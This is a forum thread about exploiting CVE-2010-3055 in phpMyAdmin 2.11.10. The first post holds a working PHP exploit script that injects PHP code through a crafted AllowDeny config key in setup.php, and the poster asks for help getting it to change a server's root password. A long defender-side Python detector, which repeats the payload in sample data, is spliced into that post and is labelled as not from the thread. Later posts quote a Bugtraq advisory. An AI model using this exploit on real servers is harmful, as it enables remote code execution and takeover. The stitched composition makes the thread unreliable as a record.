Question about phpmyadmin

Discussion in 'Песочница' (Sandbox) started by Lijzer, 5 Nov 2010.

  1. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Here is the link to the vulnerability: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3055
    Here is the exploit
    Code:
    <?php
    // this is an exploit code for phpMyAdmin 2.11.10
    
    $target_url = "http://host/path/phpmyadmin/script/setup.php";
    
    $token = null;
    
    // request 1
    $res = get_response();
    
    // request 2 (add server)
    $res = get_response('POST', "token=$token&action=addserver");
    
    // request 3 (save to session)
    $res = get_response('POST', "token=$token&action=addserver_real&host=localhost&connect_type=tcp&extension=mysql&auth_type=config&user=root&password=1&submit_save=Add&AllowDeny_order=1&AllowDeny[a][b]['.phpinfo().']=1");
    
    // request 4 (save to file)
    $res = get_response('POST', "token=$token&action=save");
    
    // request 5 (load file)
    $res = get_response('POST', "token=$token&action=load");
    var_dump($res);
    
    
    function get_response($method='GET', $body=null) {
        global $target_url, $token;
        static $ch = null;
    
        if ($ch === null) $ch = curl_init();
    
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_URL, $target_url);
    
        if ($method == 'POST') {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
        }
    
        curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookie.txt');
        curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookie.txt');
    
        $res = curl_exec($ch);
        $token = get_token($res);
    
        return $res;
    }
    
    function get_token($s) {
        if (preg_match('#name="token" value="(.*?)"#', $s, $m)) {
            return $m[1];
        }
    }
    
    So, I have pma 2.11.10, and it is definitely unpatched; I run the sploit, it prints the source of setup.php, but the root password doesn't change. Help me figure this out.
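The request sequence in the exploit above (GET setup.php for a token, then addserver, addserver_real with a crafted AllowDeny key, save, load) is also what a defender would look for in traffic to an exposed setup script. The following is an added example, not code from the thread or from phpMyAdmin: a small detector that scans request records (the shape a reverse proxy or WAF with request-body logging would keep) for that chain, scoring single suspicious requests as medium and a client that completes write-config-then-load as high. The record layout, the client addresses and the sample requests are constructed for the example.

```python
# Added example, not code from the thread: a defender-side check that scans
# request records (as a reverse proxy or WAF with body logging would keep them)
# for the phpMyAdmin setup.php request chain driven by the exploit above.
# The record layout and the sample requests are constructed for this example.
import re
from collections import defaultdict
from urllib.parse import parse_qs

# The setup-script actions the exploit walks through, in order.
CHAIN = ("addserver", "addserver_real", "save", "load")
# Completing these three means a config was written and then loaded back.
WRITE_AND_LOAD = {"addserver_real", "save", "load"}

# Characters that never belong in a legitimate AllowDeny[...] config key;
# the exploit smuggles PHP into that key (quotes, parentheses, dots).
INJECT_RE = re.compile(r"[()'\"`;.$]")


def is_setup_script(path):
    """True for requests to phpMyAdmin's setup script (.../setup.php)."""
    return path.split("?", 1)[0].lower().endswith("/setup.php")


def inspect(rec):
    """Examine one request record.

    Returns None when the request is not for setup.php, otherwise a tuple
    (action, indicators) where indicators is a list of human-readable reasons.
    """
    if not is_setup_script(rec["path"]):
        return None
    params = parse_qs(rec.get("body", ""), keep_blank_values=True)
    action = params.get("action", [""])[0]
    indicators = []
    if action in CHAIN:
        indicators.append(f"setup action={action}")
    for key in params:
        # AllowDeny_order is a normal key; only the bracketed keys get checked.
        if key.startswith("AllowDeny[") and INJECT_RE.search(key):
            indicators.append(f"code-like characters in config key {key!r}")
    if params.get("auth_type") == ["config"] and "password" in params:
        indicators.append("cleartext credentials submitted for auth_type=config")
    return action, indicators


def analyze(records):
    """Return findings for a list of records, in order.

    Each setup.php request with indicators yields a 'medium' finding; a client
    that completes addserver_real -> save -> load additionally yields one 'high'
    finding, since that is the write-config-then-load step the exploit relies on.
    """
    findings = []
    progress = defaultdict(set)  # client -> chain actions seen so far
    for rec in records:
        result = inspect(rec)
        if result is None:
            continue
        action, indicators = result
        client = rec["client"]
        if indicators:
            findings.append({"client": client, "severity": "medium",
                             "path": rec["path"], "indicators": indicators})
        if action in CHAIN:
            progress[client].add(action)
        if WRITE_AND_LOAD <= progress[client]:
            findings.append({"client": client, "severity": "high", "path": rec["path"],
                             "indicators": ["full setup chain: add server, save config, load config"]})
            progress[client].clear()
    return findings


# Constructed sample records: one client replaying the exploit's five requests
# and one unrelated client browsing index.php.
SETUP = "/phpmyadmin/scripts/setup.php"
SAMPLE_RECORDS = [
    {"client": "203.0.113.7", "method": "GET", "path": SETUP, "body": ""},
    {"client": "203.0.113.7", "method": "POST", "path": SETUP,
     "body": "token=abc&action=addserver"},
    {"client": "203.0.113.7", "method": "POST", "path": SETUP,
     "body": "token=abc&action=addserver_real&host=localhost&connect_type=tcp"
             "&extension=mysql&auth_type=config&user=root&password=1&submit_save=Add"
             "&AllowDeny_order=1&AllowDeny[a][b]['.phpinfo().']=1"},
    {"client": "203.0.113.7", "method": "POST", "path": SETUP,
     "body": "token=abc&action=save"},
    {"client": "203.0.113.7", "method": "POST", "path": SETUP,
     "body": "token=abc&action=load"},
    {"client": "198.51.100.9", "method": "GET", "path": "/phpmyadmin/index.php", "body": ""},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_RECORDS):
        print(f["severity"].upper(), f["client"], "; ".join(f["indicators"]))
```

Run stand-alone it prints four medium findings for the replaying client and one high finding once the load action completes the chain. In practice the stronger control is not the detector but the exposure: phpMyAdmin's documentation has long advised protecting or removing the setup script and its writable config directory once configuration is done, so any request to setup.php from outside the admin network is worth an alert on its own, before the parameters are even parsed.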
     
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    693
    Likes Received:
    727
    Reputations:
    948
    The unserialize() arbitrary PHP code execution exploit works on phpMyAdmin <= 2.11.9
     
    #2 Strilo4ka, 11 Nov 2010
    Last edited: 11 Nov 2010
  3. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Here is what they write on securityfocus.com:
    Code:
    Bugtraq ID: 	42591
    Class: 	Input Validation Error
    CVE: 	CVE-2010-3055
    Remote: 	Yes
    Local: 	No
    Published: 	Aug 20 2010 12:00AM
    Updated: 	Oct 25 2010 08:58AM
    Credit: 	Takeshi Terada
    Vulnerable: 	phpMyAdmin phpMyAdmin 2.11.10
    phpMyAdmin phpMyAdmin 2.11.9.4
    phpMyAdmin phpMyAdmin 2.11.9.6
    phpMyAdmin phpMyAdmin 2.11.9.2
    phpMyAdmin phpMyAdmin 2.11.9.1
    phpMyAdmin phpMyAdmin 2.11.9
    phpMyAdmin phpMyAdmin 2.11.8
    phpMyAdmin phpMyAdmin 2.11.7
    phpMyAdmin phpMyAdmin 2.11.5
    phpMyAdmin phpMyAdmin 2.11.4
    phpMyAdmin phpMyAdmin 2.11.1
    phpMyAdmin phpMyAdmin 2.11.9.5
    phpMyAdmin phpMyAdmin 2.11.9.3
    phpMyAdmin phpMyAdmin 2.11.8.1
    phpMyAdmin phpMyAdmin 2.11.5.2
    phpMyAdmin phpMyAdmin 2.11.5.1
    phpMyAdmin phpMyAdmin 2.11.2.2
    phpMyAdmin phpMyAdmin 2.11.2.1
    phpMyAdmin phpMyAdmin 2.11.10-dev
    phpMyAdmin phpMyAdmin 2.11.1.2
    phpMyAdmin phpMyAdmin 2.11.1.1
    MandrakeSoft Corporate Server 4.0 x86_64
    MandrakeSoft Corporate Server 4.0
    Debian Linux 5.0 sparc
    Debian Linux 5.0 s/390
    Debian Linux 5.0 powerpc
    Debian Linux 5.0 mipsel
    Debian Linux 5.0 mips
    Debian Linux 5.0 m68k
    Debian Linux 5.0 ia-64
    Debian Linux 5.0 ia-32
    Debian Linux 5.0 hppa
    Debian Linux 5.0 armel
    Debian Linux 5.0 arm
    Debian Linux 5.0 amd64
    Debian Linux 5.0 alpha
    Debian Linux 5.0
    These are completely different vulnerabilities.
     
    #3 Lijzer, 12 Nov 2010
    Last edited: 12 Nov 2010